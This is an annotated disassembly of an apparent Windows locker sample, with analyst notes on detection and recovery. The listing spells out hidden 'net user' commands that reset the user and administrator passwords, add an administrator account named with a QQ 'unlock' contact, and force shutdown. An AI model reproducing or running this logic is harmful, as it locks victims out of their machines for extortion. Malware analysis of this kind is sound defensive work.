; =============== S U B R O U T I N E =======================================
.data:00401100
.data:00401100 ; Attributes: bp-based frame
.data:00401100
.data:00401100 public start
.data:00401100 start proc near
.data:00401100
.data:00401100 ; int __stdcall start(a1, a2, a3, a4) -- 4 dword args inferred from 'retn 10h'; presumably WinMain linked as the
.data:00401100 ;   PE entry point, confirm against the PE header. IDA places this code in a section named .data; executable code
.data:00401100 ;   in a data section is unusual and worth checking against the PE section flags during triage.
.data:00401100 ; Purpose (as disassembled): formats four command lines with wsprintfA into stack buffers and runs each through WinExec:
.data:00401100 ;   1. "net user <current user> 107289"               -> changes the current user's password
.data:00401100 ;   2. "net user administrator 107289"                -> changes the built-in administrator's password
.data:00401100 ;   3. "net user <name> 107289 /add"                  -> creates a new local account (<name> = string at loc_401068)
.data:00401100 ;   4. "net localgroup administrators <name> /add"    -> adds that account to the local Administrators group
.data:00401100 ;   then runs "shutdown -s -t 0" and "logoff". Returns 0 in eax.
.data:00401100 ; Register roles: ebx = wsprintfA (later 0 = uCmdShow), esi = WinExec, edi = fill pointer / name string / Sleep.
.data:00401100 ;   ebx, esi, edi are pushed on entry and popped before 'leave'.
.data:00401100 ; Review notes: no API return value (GetUserNameA, wsprintfA, WinExec) is checked; if GetUserNameA fails, Buffer
.data:00401100 ;   stays all-zero and command 1 runs with an empty user name. The account changes presumably only take effect
.data:00401100 ;   when the process already holds administrative rights (behaviour of 'net user', not visible in this listing).
.data:00401100 ;   Detection: process-creation telemetry for net.exe/net1.exe and shutdown.exe spawned via WinExec with
.data:00401100 ;   'user ... 107289' / 'localgroup administrators ... /add' arguments; the literals "107289",
.data:00401100 ;   "net user administrator" and "net localgroup administrators" in this listing are usable static indicators.
.data:00401100 ;   Recovery: reset both changed passwords and remove the added account from a trusted (offline) context.
.data:00401100
.data:00401100 var_1104 = byte ptr -1104h ; 1024-byte buffer: "net localgroup administrators <name> /add"
.data:00401100 var_1103 = byte ptr -1103h ; &var_1104[1], start of the rep stos fill (byte 0 is zeroed separately)
.data:00401100 var_D04 = byte ptr -0D04h ; 1024-byte buffer: "net user administrator 107289"
.data:00401100 var_D03 = byte ptr -0D03h ; &var_D04[1]
.data:00401100 var_904 = byte ptr -904h ; 1024-byte buffer: "net user <name> 107289 /add"
.data:00401100 var_903 = byte ptr -903h ; &var_904[1]
.data:00401100 CmdLine = byte ptr -504h ; 1024-byte buffer: "net user <current user> 107289" (stack local; distinct from the global CmdLine used at 40126B)
.data:00401100 var_503 = byte ptr -503h ; &CmdLine[1]
.data:00401100 Buffer = byte ptr -104h ; 256-byte buffer filled by GetUserNameA
.data:00401100 var_103 = byte ptr -103h ; &Buffer[1]
.data:00401100 pcbBuffer = dword ptr -4 ; in/out size for GetUserNameA, preset to 100h
.data:00401100
.data:00401100 push ebp ; bp-based frame
.data:00401101 mov ebp, esp
.data:00401103 mov eax, 1104h ; frame size = 1104h bytes
.data:00401108 call __alloca_probe ; MSVC stack probe (_chkstk-style): commits the 1104h-byte frame a page at a time
.data:0040110D and [ebp+Buffer], 0 ; Buffer[0] = 0
.data:00401114 push ebx ; save callee-saved registers used below
.data:00401115 push esi
.data:00401116 push edi
.data:00401117 push 3Fh ; ecx = 3Fh (63) via push/pop: 63 dwords + word + byte = 255 bytes
.data:00401119 xor eax, eax ; fill value 0
.data:0040111B pop ecx
.data:0040111C lea edi, [ebp+var_103] ; edi = &Buffer[1]; with Buffer[0] above the whole 256 bytes are zeroed
.data:00401122 rep stosd ; 252 bytes
.data:00401124 stosw ; +2
.data:00401126 stosb ; +1
.data:00401127 lea eax, [ebp+pcbBuffer]
.data:0040112A mov [ebp+pcbBuffer], 100h ; pcbBuffer = 256 (matches Buffer size)
.data:00401131 push eax ; pcbBuffer: in/out size of the buffer
.data:00401132 lea eax, [ebp+Buffer]
.data:00401138 push eax ; lpBuffer: pointer to the output buffer
.data:00401139 call GetUserNameA ; fetch the current user name; BOOL result in eax is discarded
.data:0040113F and [ebp+CmdLine], 0 ; CmdLine[0] = 0
.data:00401146 mov ecx, 0FFh ; 255 dwords + word + byte + byte 0 = 1024 bytes zeroed
.data:0040114B xor eax, eax
.data:0040114D lea edi, [ebp+var_503] ; edi = &CmdLine[1]
.data:00401153 rep stosd
.data:00401155 stosw
.data:00401157 mov ebx, wsprintfA ; ebx = wsprintfA, kept live for all four format calls (cdecl: caller pops args)
.data:0040115D push offset a107289 ; "107289" -- 3rd %s: the new password
.data:00401162 stosb ; last byte of the CmdLine fill (scheduled between the pushes)
.data:00401163 lea eax, [ebp+Buffer] ; current user name
.data:00401169 push eax ; 2nd %s
.data:0040116A push offset aNetUser ; "net user" -- 1st %s
.data:0040116F lea eax, [ebp+CmdLine]
.data:00401175 push offset aSSS ; format string "%s %s %s"
.data:0040117A push eax ; LPSTR destination buffer
.data:0040117B call ebx ; wsprintfA ; CmdLine = "%s %s %s" <- "net user", <current user name>, "107289"
.data:0040117B ; effect of the resulting command: sets the current user's logon password to 107289
.data:0040117D mov esi, WinExec ; esi = WinExec, kept live for every command launch below
.data:00401183 add esp, 14h ; pop the 5 cdecl args of wsprintfA
.data:00401186 lea eax, [ebp+CmdLine]
.data:0040118C push 0 ; uCmdShow = SW_HIDE (0): the spawned window is hidden, no minimized icon
.data:0040118E push eax ; lpCmdLine: command line to execute
.data:0040118F call esi ; WinExec ; runs "net user <current user> 107289"; return value not checked
.data:00401191 and [ebp+var_D04], 0 ; var_D04[0] = 0
.data:00401198 mov ecx, 0FFh ; zero the remaining 1023 bytes of var_D04
.data:0040119D xor eax, eax
.data:0040119F lea edi, [ebp+var_D03] ; edi = &var_D04[1]
.data:004011A5 rep stosd
.data:004011A7 stosw
.data:004011A9 stosb
.data:004011AA push offset a107289 ; "107289" -- 2nd %s
.data:004011AF push offset aNetUserAdminis ; "net user administrator" -- 1st %s
.data:004011B4 lea eax, [ebp+var_D04]
.data:004011BA push offset aSS ; format string "%s %s"
.data:004011BF push eax ; LPSTR destination buffer
.data:004011C0 call ebx ; wsprintfA ; var_D04 = "%s %s" <- "net user administrator", "107289"
.data:004011C0 ; effect of the resulting command: sets the administrator account's password to 107289
.data:004011C2 add esp, 10h ; pop the 4 cdecl args
.data:004011C5 lea eax, [ebp+var_D04]
.data:004011CB push 0 ; uCmdShow = SW_HIDE
.data:004011CD push eax ; lpCmdLine
.data:004011CE call esi ; WinExec ; runs "net user administrator 107289"
.data:004011D0 and [ebp+var_904], 0 ; var_904[0] = 0
.data:004011D7 mov edx, 0FFh ; edx = fill count, reused for both buffers below
.data:004011DC mov ecx, edx
.data:004011DE xor eax, eax
.data:004011E0 lea edi, [ebp+var_903] ; edi = &var_904[1]
.data:004011E6 and [ebp+var_1104], 0 ; var_1104[0] = 0 (compiler interleaved this into the var_904 fill)
.data:004011ED rep stosd
.data:004011EF stosw
.data:004011F1 stosb
.data:004011F2 mov ecx, edx ; second fill: var_1104
.data:004011F4 xor eax, eax
.data:004011F6 lea edi, [ebp+var_1103] ; edi = &var_1104[1]
.data:004011FC push offset dword_401080 ; "/add" -- rightmost arg of the wsprintfA call at 401222; IDA auto-named this dword_, it is used as a string (re-type it)
.data:00401201 rep stosd
.data:00401203 stosw
.data:00401205 stosb
.data:00401206 mov edi, offset loc_401068 ; edi = pointer to the new account-name string; IDA labelled it loc_ (code) but it is string data (re-type it)
.data:0040120B push offset a107289 ; "107289" -- 3rd %s: password for the new account
.data:00401210 push edi ; "加QQ1072890578解锁" -- 2nd %s: account name; the Chinese text reads roughly "add QQ 1072890578 to unlock", a contact note embedded in the user name
.data:00401211 push offset aNetUser ; "net user" -- 1st %s
.data:00401216 push offset aSSSS ; format string "%s %s %s %s"
.data:0040121B lea eax, [ebp+var_904]
.data:00401221 push eax ; LPSTR destination buffer
.data:00401222 call ebx ; wsprintfA ; var_904 = "%s %s %s %s" <- "net user", <name>, "107289", "/add"
.data:00401224 push offset dword_401080 ; "/add" -- 3rd %s
.data:00401229 push edi ; <name>: same account-name string -- 2nd %s
.data:0040122A push offset aNetLocalgroupA ; "net localgroup administrators" -- 1st %s
.data:0040122F lea eax, [ebp+var_1104]
.data:00401235 push offset aSSS ; format string "%s %s %s"
.data:0040123A push eax ; LPSTR destination buffer
.data:0040123B call ebx ; wsprintfA ; var_1104 = "%s %s %s" <- "net localgroup administrators", <name>, "/add"
.data:0040123D add esp, 2Ch ; pop 6 + 5 = 11 dword args of the two wsprintfA calls
.data:00401240 xor ebx, ebx ; ebx = 0, reused as uCmdShow (SW_HIDE); wsprintfA is no longer needed
.data:00401242 lea eax, [ebp+var_904]
.data:00401248 push ebx ; uCmdShow = 0
.data:00401249 push eax ; lpCmdLine
.data:0040124A call esi ; WinExec ; runs "net user <name> 107289 /add": creates the new local account with that password
.data:0040124C mov edi, Sleep ; edi = Sleep (the name pointer is no longer needed)
.data:00401252 push 0BB8h ; dwMilliseconds = 3000 (3 s) -- lets the account creation finish before the group change
.data:00401257 call edi ; Sleep
.data:00401259 lea eax, [ebp+var_1104]
.data:0040125F push ebx ; uCmdShow = 0
.data:00401260 push eax ; lpCmdLine
.data:00401261 call esi ; WinExec ; runs "net localgroup administrators <name> /add": puts the new account in the local Administrators group
.data:00401263 push 1388h ; dwMilliseconds = 5000 (5 s)
.data:00401268 call edi ; Sleep
.data:0040126A push ebx ; uCmdShow = 0
.data:0040126B push offset CmdLine ; "shutdown -s -t 0" -- NOTE: a global string IDA also named CmdLine, not the stack local [ebp+CmdLine]
.data:00401270 call esi ; WinExec ; immediate shutdown
.data:00401272 push ebx ; uCmdShow = 0
.data:00401273 push offset aLogoff ; "logoff"
.data:00401278 call esi ; WinExec ; log off the current session (issued right after the shutdown request)
.data:0040127A pop edi ; restore callee-saved registers
.data:0040127B pop esi
.data:0040127C xor eax, eax ; return 0
.data:0040127E pop ebx
.data:0040127F leave ; mov esp, ebp / pop ebp
.data:00401280 retn 10h ; stdcall: callee pops the 4 dword arguments
.data:00401280 start endp